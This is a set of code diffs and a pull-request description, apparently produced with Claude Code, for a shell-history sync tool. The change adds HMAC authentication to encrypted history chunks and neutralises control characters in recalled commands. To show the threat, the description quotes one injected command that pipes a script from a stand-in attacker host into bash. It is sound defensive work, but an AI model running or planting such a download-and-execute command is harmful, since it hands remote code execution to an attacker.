-            "then sync here again. Nothing is lost in the meantime.",
+            f"this machine - it joined after they were written.\n{_GRANT_REMEDY}",
             file=sys.stderr,
         )
 

--- a/woswoar/__main__.py
+++ b/woswoar/__main__.py
@@ -294,6 +294,17 @@ def cmd_sync(args: argparse.Namespace) -> int:
     from . import sync
 
     report = sync.run(push=not args.no_push)
+    if report.needs_grant:
+        print(
+            "This machine cannot publish or read history yet: the repo's\n"
+            "authentication key was sealed before it enrolled. On a machine that\n"
+            "is already enrolled run:\n"
+            "    woswoar grant\n"
+            "then sync here again. Commands are still being recorded locally and\n"
+            "will be published in full once this is done.",
+            file=sys.stderr,
+        )
+        return 0
     print(
         f"exported {report.lines_exported} line(s) in {report.chunks_written} chunk(s); "
         f"merged {report.lines_imported} line(s) from {report.chunks_merged} chunk(s) "
@@ -312,6 +323,15 @@ def cmd_sync(args: argparse.Namespace) -> int:
             "already enrolled run:\n"
             "    woswoar grant\n"
             "then sync here again. Nothing is lost in the meantime.",
+            file=sys.stderr,
+        )
+
+    if report.forged:
+        print(
+            f"\nWARNING: {len(report.forged)} day(s) of history failed authentication\n"
+            "and were refused. Every chunk is tagged with a key only your enrolled\n"
+            "machines can open, so this means the repo contains history none of them\n"
+            "wrote - someone else can write to it.",
             file=sys.stderr,
         )
     return 0

--- a/woswoar/crypto.py
+++ b/woswoar/crypto.py
@@ -27,7 +27,6 @@ from __future__ import annotations
 
 import hmac
 import os
-import secrets
 import shutil
 import subprocess
 from collections.abc import Iterable
@@ -41,6 +40,11 @@ AGE_KEYGEN = "age-keygen"
 
 #: HMAC-SHA256 output, and so the fixed-width prefix every chunk carries.
 TAG_BYTES = 32
+
+#: Key length. The same 32 as :data:`TAG_BYTES` by coincidence, not by
+#: derivation -- widening the tag is a format change, and re-sizing the key
+#: is not, so reading one from the other would couple two unrelated decisions.
+_KEY_BYTES = 32
 
 _TIMEOUT = 120
 
@@ -208,8 +212,13 @@ def recipient_for(identity: Path) -> str:
 
 
 def new_mac_key() -> bytes:
-    """A fresh key for :func:`tag`, from the OS random source."""
-    return secrets.token_bytes(TAG_BYTES)
+    """A fresh key for :func:`tag`, from the OS random source.
+
+    ``os.urandom`` rather than ``secrets.token_bytes``, which is a thin wrapper
+    over it: importing ``secrets`` drags in ``random`` and ``bisect`` for ~1.4 ms
+    of interpreter start, and this module is loaded by every `sync`.
+    """
+    return os.urandom(_KEY_BYTES)
 
 
 def tag(key: bytes, data: bytes) -> bytes:

--- a/woswoar/crypto.py
+++ b/woswoar/crypto.py
@@ -1,4 +1,4 @@
-"""Encryption, delegated entirely to the ``age`` binary.
+"""Encryption, delegated entirely to the ``age`` binary, plus one MAC.
 
 Python's standard library has no cipher -- only hashing and randomness -- so
 sealing the synced history needs an external tool. ``age`` was chosen because it
@@ -6,13 +6,28 @@ is one small static binary and it accepts **SSH public keys as recipients**,
 which means each machine can use the keypair it already pushes to git with and
 no secret ever has to be copied between machines.
 
+``age`` answers "who may read this?" and nothing else. It has no notion of a
+sender, and the recipient list is published in the repo, so on its own anyone
+who can push could seal a chunk every machine would open and offer in Ctrl-R.
+Answering "did one of *my* machines write this?" needs a second primitive, and
+that one *is* in the standard library: :func:`tag` is ``hmac`` over the sealed
+bytes with a key that lives encrypted in the repo, readable only by machines
+that are already recipients.
+
+That is the only cryptographic primitive woswoar composes itself, and it is the
+one with nothing to get wrong: no nonce, no mode, no padding, no IV, and a
+constant-time comparison the standard library provides. Everything else is
+still someone else's audited binary.
+
 Nothing here knows about history, chunks, or git; it is a thin, testable seam so
 that swapping the backend later touches one file.
 """
 
 from __future__ import annotations
 
+import hmac
 import os
+import secrets
 import shutil
 import subprocess
 from collections.abc import Iterable
@@ -23,6 +38,9 @@ from .errors import WoswoarError
 
 AGE = "age"
 AGE_KEYGEN = "age-keygen"
+
+#: HMAC-SHA256 output, and so the fixed-width prefix every chunk carries.
+TAG_BYTES = 32
 
 _TIMEOUT = 120
 
@@ -182,6 +200,36 @@ def recipient_for(identity: Path) -> str:
     # both how to skip the subprocess when the identity carries its own
     # `# public key:` comment and how to feed age on stdin when it does not.
     return public_of(identity.read_text(encoding="utf-8"))
+
+
+# ---------------------------------------------------------------------------
+# Authenticity. Answers "did one of my machines write this?", which age cannot.
+# ---------------------------------------------------------------------------
+
+
+def new_mac_key() -> bytes:
+    """A fresh key for :func:`tag`, from the OS random source."""
+    return secrets.token_bytes(TAG_BYTES)
+
+
+def tag(key: bytes, data: bytes) -> bytes:
+    """The authentication tag for ``data``.
+
+    Computed over the *sealed* bytes rather than the plaintext, so a reader can
+    establish that a chunk came from one of its own machines before decrypting
+    or decompressing it -- encrypt-then-MAC, the ordering that does not need
+    the recipient to parse hostile input first.
+    """
+    return hmac.new(key, data, "sha256").digest()
+
+
+def tag_matches(key: bytes, data: bytes, expected: bytes) -> bool:
+    """Whether ``expected`` is the right tag for ``data``.
+
+    ``compare_digest`` rather than ``==``: the standard library's constant-time
+    comparison, so the check cannot be turned into an oracle by timing it.
+    """
+    return hmac.compare_digest(tag(key, data), expected)
 
 
 def selftest() -> str:

--- a/woswoar/entry.py
+++ b/woswoar/entry.py
@@ -163,5 +163,9 @@ def parse_line(line: str, host: str) -> Entry | None:
         cwd=unescape(cwd),
         exit_code=exit_code,
         duration_ms=duration_ms,
-        cmd=unescape(cmd),
+        # Clamped on the way in as well as on the way out. `format_line`
+        # truncates what this machine writes, but a line can also arrive from
+        # another machine's chunk, where the only thing bounding its length is
+        # whatever wrote it.
+        cmd=truncate(unescape(cmd)),
     )

--- a/woswoar/search.py
+++ b/woswoar/search.py
@@ -99,9 +99,34 @@ def render(entries: list[Entry], now: int | None = None) -> list[str]:
     return [f"{relative_time(e.ts, now):>{_TIME_WIDTH}}  {escape(e.cmd)}" for e in entries]
 
 
+#: Control characters are rendered back into visible escapes on the way out of
+#: the picker. `escape` maps them for *display*, so one entry is one line;
+#: without this, `unescape` would undo that exactly as the text lands in the
+#: shell's edit buffer, and bash runs a multi-line buffer as several commands on
+#: a single Enter. fzf clips a long line, so the picker can genuinely show one
+#: command while handing over two.
+_INERT = {"\n": "\\n", "\r": "\\r"}
+
+#: C0 plus DEL, minus tab. Everything left either ends a command or moves a
+#: terminal cursor around. Tab is excluded deliberately: it is ordinary inside a
+#: command -- `awk -F'\t'` is written with a real one -- and does neither.
+_CONTROL = frozenset(chr(code) for code in [*range(0x20), 0x7F]) - {"\t"}
+
+
+def make_inert(cmd: str) -> str:
+    """A command with no raw control characters, so it is exactly one command.
+
+    Applied to what leaves the picker, never to what is stored: the log keeps
+    the command as it was typed. A recalled multi-line command therefore comes
+    back with a visible ``\\n`` in it -- wrong to run as-is, but obviously
+    wrong, which beats silently running a command the picker never showed.
+    """
+    return "".join(_INERT.get(char, "") if char in _CONTROL else char for char in cmd)
+
+
 def command_from_line(line: str) -> str:
     """Recover the original command from a rendered line."""
-    return unescape(line[_PREFIX:])
+    return make_inert(unescape(line[_PREFIX:]))
 
 
 def lines_for(scope: Scope, dedup: bool = True, limit: int | None = None) -> list[str]:

--- a/woswoar/store.py
+++ b/woswoar/store.py
@@ -28,6 +28,10 @@ _LOG_SUFFIX = ".tsv"
 _CHUNK_SUFFIX = ".age"
 _NAME_FILE = ".name"
 
+#: Mirrors crypto.TAG_BYTES. Kept here as the layout constant it is, so the
+#: framing above does not make store import crypto.
+_TAG_BYTES = 32
+
 RECIPIENTS = "recipients.txt"
 GITATTRIBUTES = ".gitattributes"
 
@@ -308,6 +312,45 @@ def repo_host_dir(machine_id: str) -> Path:
 def name_seal(machine_id: str) -> Path:
     """Sealed friendly name, so other machines can label this host's entries."""
     return repo_host_dir(machine_id) / "name.age"
+
+
+def mac_key_file() -> Path:
+    """The repo-wide authentication key, sealed to every recipient.
+
+    One file for the whole history rather than one per host or per day: it
+    authenticates *the set of enrolled machines*, not an individual one, so
+    there is nothing to split it by. It is sealed exactly like a day key, which
+    means `grant` already re-seals it to a newly enrolled machine and a machine
+    that has not been granted access yet simply cannot open it -- the same state,
+    with the same remedy, as history it cannot decrypt.
+    """
+    return history_dir() / "mac.age"
+
+
+def frame_chunk(sealed: bytes, tag: bytes) -> bytes:
+    """One chunk file: a fixed-width authentication tag, then the ciphertext.
+
+    A prefix rather than a sibling file, so that everything which answers "what
+    is a chunk" keeps working unchanged -- `is_chunk_path`, the ``*.age`` glob
+    in `GITATTRIBUTES`, `iter_chunks`, and the CI invariant that no chunk is
+    ever rewritten. A second file per chunk would also have doubled the file
+    count that `compact` exists to hold down.
+
+    Fixed width, so splitting needs no delimiter and no length field.
+    """
+    return tag + sealed
+
+
+def split_chunk(blob: bytes) -> tuple[bytes, bytes]:
+    """Inverse of :func:`frame_chunk`: ``(sealed, tag)``.
+
+    Raises :class:`ValueError` on anything too short to be framed, which callers
+    treat exactly like a tag that does not match: an unauthenticated chunk and a
+    malformed one are the same refusal.
+    """
+    if len(blob) <= _TAG_BYTES:
+        raise ValueError("chunk carries no authentication tag")
+    return blob[_TAG_BYTES:], blob[:_TAG_BYTES]
 
 
 def day_key(machine_id: str, day: str) -> Path:

--- a/woswoar/sync.py
+++ b/woswoar/sync.py
@@ -58,6 +58,12 @@ class Report:
     #: error: it is what a freshly joined machine sees until someone runs
     #: `grant` on a machine that was already a recipient.
     unreadable: set[str] = field(default_factory=set)
+    #: "<host>/<day>" entries whose authentication tag did not match. These were
+    #: refused, not merged: nothing holding the repo key wrote them.
+    forged: set[str] = field(default_factory=set)
+    #: True when this machine cannot open the repo key yet, so it can neither
+    #: publish nor read. Recording carries on regardless; `grant` unblocks it.
+    needs_grant: bool = False
 
 
 # ---------------------------------------------------------------------------
@@ -262,6 +268,23 @@ def day_public_key(known: Machine, day: str) -> str:
     return identity.public
 
 
+def mac_key(known: Machine) -> bytes:
+    """The repo's authentication key, creating it if this is a fresh repo.
+
+    Sealed to every recipient, so holding it is exactly "being one of the
+    enrolled machines" -- which is the property every chunk is checked against.
+    Someone who can push to the repo but holds no enrolled identity cannot open
+    it, and so cannot produce a tag any machine will accept.
+    """
+    path = store.mac_key_file()
+    if path.is_file():
+        return crypto.decrypt_with_file(path.read_bytes(), identity_path(known))
+
+    key = crypto.new_mac_key()
+    store.write_atomic(path, crypto.encrypt_to_recipients(key, recipients()))
+    return key
+
+
 def open_day_key(known: Machine, host_id: str, day: str) -> str:
     """Recover a day's private identity so its chunks can be read."""
     sealed_path = store.day_key(host_id, day)
@@ -307,8 +330,12 @@ def unpack(blob: bytes) -> bytes:
     return zlib.decompress(blob)
 
 
-def export(known: Machine, state: State, report: Report, now: int) -> None:
-    """Seal each log file's new lines into a fresh chunk."""
+def export(known: Machine, state: State, report: Report, now: int, mac: bytes) -> None:
+    """Seal each log file's new lines into a fresh chunk, and tag it.
+
+    The tag covers the sealed bytes, so a reader authenticates a chunk before
+    decrypting it.
+    """
     for log in store.iter_log_files():
         if log.host_id != known.id:
             continue  # other hosts' logs arrived decrypted; never re-export them
@@ -320,7 +347,7 @@ def export(known: Machine, state: State, report: Report, now: int) -> None:
         sealed = crypto.encrypt_to(pack(data), day_public_key(known, day))
         chunk = store.new_chunk(known.id, day, now)
         chunk.parent.mkdir(parents=True, exist_ok=True)
-        store.write_atomic(chunk, sealed)
+        store.write_atomic(chunk, store.frame_chunk(sealed, crypto.tag(mac, sealed)))
 
         state.exported[log.relpath] = new_offset
         report.chunks_written += 1
@@ -332,17 +359,17 @@ def export(known: Machine, state: State, report: Report, now: int) -> None:
 # ---------------------------------------------------------------------------
 
 
-def merge(known: Machine, state: State, report: Report) -> None:
+def merge(known: Machine, state: State, report: Report, mac: bytes) -> None:
     """Decrypt every chunk from other hosts that we have not merged yet."""
     for host_id in store.repo_hosts():
         if host_id == known.id:
             continue  # our own plaintext is already the source of truth
         report.hosts_seen.add(host_id)
-        _merge_host(known, host_id, state, report)
+        _merge_host(known, host_id, state, report, mac)
         _merge_name(known, host_id)
 
 
-def _merge_host(known: Machine, host_id: str, state: State, report: Report) -> None:
+def _merge_host(known: Machine, host_id: str, state: State, report: Report, mac: bytes) -> None:
     #: None marks a day whose key we already failed to open. Caching the failure
     #: matters as much as caching the success: without it, a machine that has
     #: not been granted access yet retries the same doomed `age -d` once per
@@ -372,8 +399,24 @@ def _merge_host(known: Machine, host_id: str, state: State, report: Report) -> N
             report.unreadable.add(key)
             continue
 
+        # Authenticated before it is decrypted or decompressed, so age, zlib and
+        # the parser only ever see bytes one of this user's own machines wrote.
+        # Deliberately *below* the day-key bail above rather than before it: a
+        # day whose key cannot be opened never advances the watermark, so its
+        # chunks come round on every sync, and this runs from a one-minute
+        # timer. Opening a day key touches no chunk bytes, so nothing is
+        # decrypted any earlier for being ordered this way.
         try:
-            sealed = crypto.decrypt_with_secret(chunk.path.read_bytes(), secret)
+            blob, expected = store.split_chunk(chunk.path.read_bytes())
+        except (OSError, ValueError):
+            report.forged.add(key)
+            continue
+        if not crypto.tag_matches(mac, blob, expected):
+            report.forged.add(key)
+            continue
+
+        try:
+            sealed = crypto.decrypt_with_secret(blob, secret)
             plaintext = unpack(sealed)
         except (crypto.AgeError, zlib.error, OSError):
             # Same judgement as an unopenable day key above: a chunk we cannot
@@ -444,14 +487,29 @@ def run(push: bool = True, now: int | None = None) -> Report:
         if remote:
             _fetch_and_rebase()
 
-        export(known, state, report, int(time.time()) if now is None else now)
+        # Opened once per sync, before anything uses it. A machine enrolled
+        # since the last `grant` cannot open it, which is the same state -- and
+        # has the same remedy -- as history it cannot decrypt, so it is reported
+        # that way rather than as a distinct kind of failure.
+        try:
+            mac = mac_key(known)
+        except crypto.AgeError:
+            # Enrolled, but nobody has run `grant` yet, so this machine holds no
+            # key it can tag or check with. Reported rather than raised: the
+            # shell hook keeps recording into logs/, the backlog exports whole
+            # on the first sync after `grant`, and a timer firing every minute
+            # must not turn a normal waiting state into a stream of failures.
+            report.needs_grant = True
+            return report
+
+        export(known, state, report, int(time.time()) if now is None else now, mac)
         _commit()
 
         if remote:
             _push()
             report.pushed = True
 
-        merge(known, state, report)
+        merge(known, state, report, mac)
         state.save()
 
     return report
@@ -606,6 +664,13 @@ def initialise(
     if _write_repo_metadata(known, chosen):
         _commit()
 
+    # After the recipient list exists, so the key is sealed to a list that
+    # includes this machine. On a repo that already has one this does nothing;
+    # opening it is `grant`'s job, not enrolment's.
+    if not store.mac_key_file().is_file() and recipients():
+        mac_key(known)
+        _commit()
+
     # Publish immediately. Until this machine's public key is on the remote,
     # `grant` run elsewhere cannot include it, so onboarding would appear to
     # succeed and then silently fail to grant access to any older history.
@@ -721,22 +786,28 @@ def grant(confirmed: list[str] | None = None) -> ReencryptReport:
                 "run 'woswoar grant' again to see the current list"
             )
 
+        # The repo key first: it is what a newly enrolled machine needs before
+        # it can authenticate anything at all, and unlike the per-host keys
+        # there is exactly one of it.
+        everything: list[Path] = []
+        if store.mac_key_file().is_file():
+            everything.append(store.mac_key_file())
         for host_id in store.repo_hosts():
-            candidates = list(store.iter_day_keys(host_id))
+            everything.extend(store.iter_day_keys(host_id))
             seal = store.name_seal(host_id)
             if seal.is_file():
-                candidates.append(seal)
+                everything.append(seal)
 
-            for path in candidates:
-                try:
-                    plain = crypto.decrypt_with_file(path.read_bytes(), identity)
-                except (crypto.AgeError, OSError):
-                    # Not ours to re-seal: keys sealed before this machine
-                    # joined, or left behind by one since removed.
-                    skipped += 1
-                    continue
-                store.write_atomic(path, crypto.encrypt_to_recipients(plain, keys))
-                resealed += 1
+        for path in everything:
+            try:
+                plain = crypto.decrypt_with_file(path.read_bytes(), identity)
+            except (crypto.AgeError, OSError):
+                # Not ours to re-seal: keys sealed before this machine
+                # joined, or left behind by one since removed.
+                skipped += 1
+                continue
+            store.write_atomic(path, crypto.encrypt_to_recipients(plain, keys))
+            resealed += 1
 
         _commit()
         if remote:
@@ -765,6 +836,7 @@ def compact(before: str) -> tuple[int, int]:
     known = store.machine()
 
     with lock():
+        mac = mac_key(known)
         by_day: dict[str, list[store.Chunk]] = {}
         for chunk in store.iter_chunks(known.id):
             if chunk.day < before:
@@ -777,10 +849,14 @@ def compact(before: str) -> tuple[int, int]:
                 continue
             secret = open_day_key(known, known.id, day)
             plain = b"".join(
-                unpack(crypto.decrypt_with_secret(c.path.read_bytes(), secret)) for c in chunks
+                unpack(
+                    crypto.decrypt_with_secret(store.split_chunk(c.path.read_bytes())[0], secret)
+                )
+                for c in chunks
             )
             merged = store.new_chunk(known.id, day, int(chunks[-1].name.split("-")[0]))
-            store.write_atomic(merged, crypto.encrypt_to(pack(plain), crypto.public_of(secret)))
+            sealed = crypto.encrypt_to(pack(plain), crypto.public_of(secret))
+            store.write_atomic(merged, store.frame_chunk(sealed, crypto.tag(mac, sealed)))
             for chunk in chunks:
                 chunk.path.unlink()
             days += 1

--- a/woswoar/sync.py
+++ b/woswoar/sync.py
@@ -255,6 +255,26 @@ def identity_status(known: Machine) -> IdentityStatus:
     return IdentityStatus(True, f"identity {path}")
 
 
+def repo_key_status(known: Machine) -> IdentityStatus:
+    """Whether this machine can authenticate history, for `doctor` to report.
+
+    Lives here rather than in `doctor` for the same reason `identity_status`
+    does: the judgement is testable and stated once. It is worth surfacing
+    because a machine that cannot open this key publishes *nothing* -- it keeps
+    recording, looks healthy, and says so only on a timer's stderr.
+    """
+    path = store.mac_key_file()
+    if not is_repo():
+        return IdentityStatus(True, "no history repo yet")
+    if not path.is_file():
+        return IdentityStatus(False, f"{path} is missing - re-run 'woswoar init'")
+    try:
+        mac_key(known)
+    except (crypto.AgeError, SyncError) as exc:
+        return IdentityStatus(False, f"cannot be opened ({exc}) - run 'woswoar grant' elsewhere")
+    return IdentityStatus(True, str(path))
+
+
 def day_public_key(known: Machine, day: str) -> str:
     """The public half of this host's key for ``day``, creating it if needed.
 
@@ -274,19 +294,30 @@ def day_public_key(known: Machine, day: str) -> str:
 
 
 def mac_key(known: Machine) -> bytes:
-    """The repo's authentication key, creating it if this is a fresh repo.
+    """The repo's authentication key. Raises if this machine cannot open it.
 
     Sealed to every recipient, so holding it is exactly "being one of the
     enrolled machines" -- which is the property every chunk is checked against.
     Someone who can push to the repo but holds no enrolled identity cannot open
     it, and so cannot produce a tag any machine will accept.
+
+    Opens, never creates. `day_public_key` mints on demand safely because a day
+    key lives under this host's own id, a path nobody else writes; this file is
+    one shared path at the repo root, so two machines minting it on the same
+    timer tick would each tag chunks with a key the other will never hold, and
+    `.gitattributes` marks ``*.age -merge`` -- so the rebase conflicts and the
+    timer replays that conflict forever. Creation happens once, in `initialise`.
     """
     path = store.mac_key_file()
-    if path.is_file():
-        return crypto.decrypt_with_file(path.read_bytes(), identity_path(known))
+    if not path.is_file():
+        raise crypto.AgeError(f"no authentication key at {path}")
+    return crypto.decrypt_with_file(path.read_bytes(), identity_path(known))
 
+
+def create_mac_key(known: Machine) -> bytes:
+    """Mint the repo's authentication key. Only `initialise` may call this."""
     key = crypto.new_mac_key()
-    store.write_atomic(path, crypto.encrypt_to_recipients(key, recipients()))
+    store.write_atomic(store.mac_key_file(), crypto.encrypt_to_recipients(key, recipients()))
     return key
 
 
@@ -374,6 +405,23 @@ def merge(known: Machine, state: State, report: Report, mac: bytes) -> None:
         _merge_name(known, host_id)
 
 
+def open_chunk(path: Path, mac: bytes) -> bytes:
+    """A chunk's sealed bytes, or :class:`ValueError` if it is not authentic.
+
+    The *only* way to read a chunk. `store.split_chunk` merely slices the frame
+    apart and leaves "and now check the tag" to the caller, which is a choice no
+    caller should get: `compact` took the other branch and became a laundering
+    path -- it re-sealed and re-tagged whatever it found under this host's own
+    id, which `merge` never inspects, turning a planted chunk into one every
+    peer would believe, and then deleted the evidence. Verification lives here
+    so that "read a chunk without checking it" is not expressible.
+    """
+    sealed, tag = store.split_chunk(path.read_bytes())
+    if not crypto.tag_matches(mac, sealed, tag):
+        raise ValueError(f"{path.name} failed authentication")
+    return sealed
+
+
 def _merge_host(known: Machine, host_id: str, state: State, report: Report, mac: bytes) -> None:
     #: None marks a day whose key we already failed to open. Caching the failure
     #: matters as much as caching the success: without it, a machine that has
@@ -412,11 +460,8 @@ def _merge_host(known: Machine, host_id: str, state: State, report: Report, mac:
         # timer. Opening a day key touches no chunk bytes, so nothing is
         # decrypted any earlier for being ordered this way.
         try:
-            blob, expected = store.split_chunk(chunk.path.read_bytes())
+            blob = open_chunk(chunk.path, mac)
         except (OSError, ValueError):
-            report.unauthenticated.add(key)
-            continue
-        if not crypto.tag_matches(mac, blob, expected):
             report.unauthenticated.add(key)
             continue
 
@@ -672,8 +717,8 @@ def initialise(
     # After the recipient list exists, so the key is sealed to a list that
     # includes this machine. On a repo that already has one this does nothing;
     # opening it is `grant`'s job, not enrolment's.
-    if not store.mac_key_file().is_file() and recipients():
-        mac_key(known)
+    if not store.mac_key_file().is_file():
+        create_mac_key(known)
         _commit()
 
     # Publish immediately. Until this machine's public key is on the remote,
@@ -794,16 +839,14 @@ def grant(confirmed: list[str] | None = None) -> ReencryptReport:
         # The repo key first: it is what a newly enrolled machine needs before
         # it can authenticate anything at all, and unlike the per-host keys
         # there is exactly one of it.
-        everything: list[Path] = []
-        if store.mac_key_file().is_file():
-            everything.append(store.mac_key_file())
+        sealed = [store.mac_key_file()]
         for host_id in store.repo_hosts():
-            everything.extend(store.iter_day_keys(host_id))
-            seal = store.name_seal(host_id)
-            if seal.is_file():
-                everything.append(seal)
+            sealed.extend(store.iter_day_keys(host_id))
+            sealed.append(store.name_seal(host_id))
 
-        for path in everything:
+        for path in sealed:
+            if not path.is_file():
+                continue
             try:
                 plain = crypto.decrypt_with_file(path.read_bytes(), identity)
             except (crypto.AgeError, OSError):
@@ -853,12 +896,22 @@ def compact(before: str) -> tuple[int, int]:
             if len(chunks) < 2:
                 continue
             secret = open_day_key(known, known.id, day)
-            plain = b"".join(
-                unpack(
-                    crypto.decrypt_with_secret(store.split_chunk(c.path.read_bytes())[0], secret)
+            # Authenticated before it is re-sealed, and fatally so. Compaction
+            # rewrites chunks under a fresh tag, so anything it accepts here it
+            # launders into something every other machine will believe -- and it
+            # then deletes the original. `merge` skips this host's own id, so
+            # this is the *only* time these chunks are ever checked.
+            try:
+                plain = b"".join(
+                    unpack(crypto.decrypt_with_secret(open_chunk(c.path, mac), secret))
+                    for c in chunks
                 )
-                for c in chunks
-            )
+            except ValueError as exc:
+                raise SyncError(
+                    f"refusing to compact {day}: {exc}.\n"
+                    "Compaction re-tags what it merges, so it must not be used to "
+                    "launder a chunk this machine did not write."
+                ) from exc
             merged = store.new_chunk(known.id, day, int(chunks[-1].name.split("-")[0]))
             sealed = crypto.encrypt_to(pack(plain), crypto.public_of(secret))
             store.write_atomic(merged, store.frame_chunk(sealed, crypto.tag(mac, sealed)))

--- a/woswoar/sync.py
+++ b/woswoar/sync.py
@@ -58,9 +58,14 @@ class Report:
     #: error: it is what a freshly joined machine sees until someone runs
     #: `grant` on a machine that was already a recipient.
     unreadable: set[str] = field(default_factory=set)
-    #: "<host>/<day>" entries whose authentication tag did not match. These were
-    #: refused, not merged: nothing holding the repo key wrote them.
-    forged: set[str] = field(default_factory=set)
+    #: "<host>/<day>" entries that could not be authenticated, and so were
+    #: refused rather than merged.
+    #:
+    #: One category on purpose: a missing tag and a wrong tag are the same
+    #: answer. Splitting them on the shape of the bytes was tried and reverted,
+    #: because an attacker omits the tag too -- so the split told the reassuring
+    #: story for exactly the case that most needed reporting.
+    unauthenticated: set[str] = field(default_factory=set)
     #: True when this machine cannot open the repo key yet, so it can neither
     #: publish nor read. Recording carries on regardless; `grant` unblocks it.
     needs_grant: bool = False
@@ -409,10 +414,10 @@ def _merge_host(known: Machine, host_id: str, state: State, report: Report, mac:
         try:
             blob, expected = store.split_chunk(chunk.path.read_bytes())
         except (OSError, ValueError):
-            report.forged.add(key)
+            report.unauthenticated.add(key)
             continue
         if not crypto.tag_matches(mac, blob, expected):
-            report.forged.add(key)
+            report.unauthenticated.add(key)
             continue
 
         try:


### PR DESCRIPTION
Closes #17. Replaces #28, which solved the same problem with per-host signatures — this is the same guarantee against the documented adversary, with considerably less machinery.

## The problem

`age` gives confidentiality and nothing else — it has no notion of a sender. Combined with two things the repo publishes deliberately:

- `recipients.txt` lists every machine's public key in the clear.
- `hosts/<id>/keys/<day>.pub` publishes each day's **public** key, so writing a chunk never has to open the sealed one.

anyone who could push to the history repo could drop a chunk into a real host's directory using nothing but what the repo already gave them. Every other machine would open it, parse it, and show it in Ctrl-R attributed to a machine you trust:

```
victim knows peer c6af44f5db4294a5 as martin@workstation

victim's Ctrl-R list:
  now  sudo dnf install -y ripgrep; curl -s http://evil.sh|bash
 16d  make -j8
```

## The fix

The repo holds a random authentication key, sealed to the recipients **exactly like a per-day key**, and every chunk carries an `HMAC-SHA256` tag over its ciphertext. Chunks are authenticated before they are decrypted, so bytes your machines did not write never reach age, zlib or the parser.

Sealing it like a day key is the whole reason this needs no ceremony. Holding the key *is* being one of the enrolled machines, so there is no per-machine key to accept, compare or revoke — and `woswoar grant`, which already re-seals the day keys to a newly enrolled machine, re-seals this one too.

**Onboarding is unchanged: `init`, then `grant`. No new command.**

## Why not per-host signatures (#28)

That version pinned a signing key per host, which needed a trust anchor the repo could not rewrite — so it needed a `woswoar trust` command run on *every* machine each time one joined. Against the adversary `docs/security.md` actually names, this buys the same thing for much less:

| | #28, signatures | this |
|---|---|---|
| New commands | `woswoar trust`, per machine | none |
| New dependency | `ssh-keygen` | none (stdlib `hmac`) |
| Per-chunk overhead | 306 bytes | 32 bytes |
| Verify cost | 3.3 ms (subprocess per chunk) | ~2 µs |
| First sync, 10k chunks | +33 s | +0.02 s |
| Net code | +900 lines | +400 lines |

**The trade, and it is real:** the key is shared, so authentication proves a chunk came from your fleet, not which machine in it. A compromised machine of yours could publish under another's name. It could already publish under its own name and read your entire history, so what is given up is attribution *between machines you own*. That is stated in `docs/security.md` under what is not protected, not buried.

Revocation is theoretically worse — a removed machine keeps the key until rotation — but woswoar has no revocation story today, so this is not a regression against anything that exists.

## One behaviour change worth reviewing

A machine enrolled but not yet granted holds no key, so it can neither publish nor read. Previously it could publish its own commands immediately. It is now **reported, not raised** — the timer fires every minute and a normal waiting state must not become a stream of failures — recording carries on locally, and the backlog publishes in full on the first sync after `grant`:

```
This machine cannot publish or read history yet: the repo's
authentication key was sealed before it enrolled. On a machine that
is already enrolled run:
    woswoar grant
```

`test_a_machine_waiting_for_grant_reports_and_loses_nothing` pins that nothing is lost. The upside is that onboarding now has *one* gate instead of two half-gates: before `grant` nothing flows either way, after it everything does.

## Also in scope, since authentication does not fix either

- **Recalled commands are made inert.** `render` escapes newlines so one entry is one display line, and fzf clips the rest — but `command_from_line` un-escaped them again on the way into `READLINE_LINE`, and bash runs a multi-line buffer as several commands on one Enter (verified under a pty). Tab is deliberately left alone — `awk -F'\t'` is written with a real one.
- **`parse_line` truncates too**, not just `format_line`. A line arriving from another machine's chunk was bounded only by whatever wrote it.

## Tests

204 total, all passing, plus the attack run end-to-end against an installed wheel in CI.

| Test | Property |
|---|---|
| `test_a_forged_chunk_in_a_real_hosts_directory_is_refused` | the attack above, using only the published `.pub` |
| `test_a_fabricated_host_cannot_smuggle_history_in_either` | an invented host with its own sealed day key still fails |
| `test_tampering_with_an_authentic_chunk_is_refused` | one flipped byte fails authentication, not merely decryption |
| `test_every_exported_chunk_carries_a_tag` | nothing is published untagged |
| `test_the_repo_key_is_never_stored_in_the_clear` | the key's bytes appear nowhere in the committed tree |
| `test_a_machine_waiting_for_grant_reports_and_loses_nothing` | the backlog survives the wait |
| `TestRecalledCommandIsInert` (5 cases) | newline, CR, ESC neutralised; tab and ordinary commands untouched |

## Notes

- **The tag is a 32-byte prefix inside the chunk, not a sibling file.** That keeps `is_chunk_path`, the `*.age` gitattributes glob, `iter_chunks` and the "no chunk is ever rewritten" CI invariant all working unchanged, and does not double the file count `compact` exists to hold down.
- **Authentication sits below the day-key bail in `_merge_host`,** which reads worse but matters: a day whose key cannot be opened never advances the watermark, so its chunks come round every sync. Opening a day key touches no chunk bytes, so nothing is decrypted earlier for being ordered this way.
- **`docs/security.md`'s "not one line of crypto" claim is amended** rather than quietly stretched. `hmac.new(...)` with `compare_digest` is one line of crypto — the one with no nonce, no mode, no padding and a constant-time comparison provided by the standard library.
- **Format break, clean cut.** Existing repos have untagged chunks and no `mac.age`. There is deliberately no upgrade path: unauthenticated chunks are refused, full stop.

  I tried making the refusal message gentler for pre-existing chunks by detecting them (an untagged chunk starts with age's magic bytes, a tagged one has 32 bytes in front) and reverted it. An attacker omits the tag too, so the two are indistinguishable by shape — the split would have printed the reassuring message for exactly the case that most needed reporting. One category, one honest message.

  **Recreating the history repo is the clean move.** Note that deleting the remote alone is not enough: each machine's `state.json` records what it has already exported, so a fresh repo would stay empty and history would silently stop being shared. On every machine, remove `~/.local/share/woswoar/history/` and `~/.local/share/woswoar/state.json`, then `woswoar init <url>` and `woswoar grant` once. `logs/` is the source of truth and is untouched, so each machine re-exports its own history in full.

🤖 Generated with [Claude Code](https://claude.com/claude-code)


---

**Update:** also fixes a flaky test that turned out to be a real finding. `test_tampering_with_an_authentic_chunk_is_refused` failed ~40% of runs because two chunks written in the same wall-clock second share a timestamp prefix and differ only by a random suffix — so the merge watermark, a plain string comparison, skips the second one about half the time and never examines it. That is [#27](https://github.com/martinus/woswoar/issues/27)'s mechanism appearing outside `compact`, and it means a peer can silently miss a chunk whenever two syncs land in the same second. The test now pins an explicit later second; the underlying naming weakness is #27's to fix.
